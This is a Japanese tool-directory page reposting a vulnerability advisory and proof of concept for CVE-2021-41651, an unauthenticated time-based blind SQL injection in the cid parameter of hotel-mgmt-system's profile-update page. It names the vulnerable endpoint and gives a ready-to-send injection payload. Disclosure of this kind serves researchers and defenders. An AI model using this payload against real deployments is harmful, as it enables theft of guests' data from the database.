Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/mobiusbinary/cve-2021-41651
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト
GitHubmobiusbinary/cve-2021-41651

CVE-2021-41651

CVE-2021-41651 用の概念実証エクスプロイト。hotel-mgmt-system における cid パラメータを介した認証不要の時間ベースのブラインドSQLインジェクションを実証し、MySQL からの機密データの抽出を可能にします。

リポジトリを見る
14年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2021-41651

CVE-2021-41651 SQLインジェクション(hotel-mgmt-system)

hotel-mgmt-system は、認証不要の時間ベースブラインドSQLインジェクション攻撃に対して脆弱です。

/process_update_profile.php ページの cid パラメータはユーザー入力を適切にサニタイズしておらず、攻撃者は基盤となるMySQLデータベースから機密データを抽出できます。

アプリケーションへのリンク

hotel-mgmt-system

影響を受けるコンポーネントとパラメータ

URL: /process_update_profile.php
パラメータ: cid

PoC

SQLMap ペイロード

/process_update_profile.php ページの cid パラメータ

パラメータ: cid ((custom) POST) タイプ: time-based blind タイトル: MySQL >= 5.0.12 AND time-based blind (query SLEEP) ペイロード: phone=123456778&cid=14 AND (SELECT 9048 FROM (SELECT(SLEEP(5)))zCfD)-- IKdVf&submitBtn=Update&fullName=James&[email protected]&newPassword=fasdfasdfasdfasdfasdf-

PoC画像が見づらい場合は、GIFをクリックすると高解像度で表示されます。

PoC - CID

発見者

Jason Colyvas
MOBIUSBINARY
2021年9月23日

ツールをダウンロード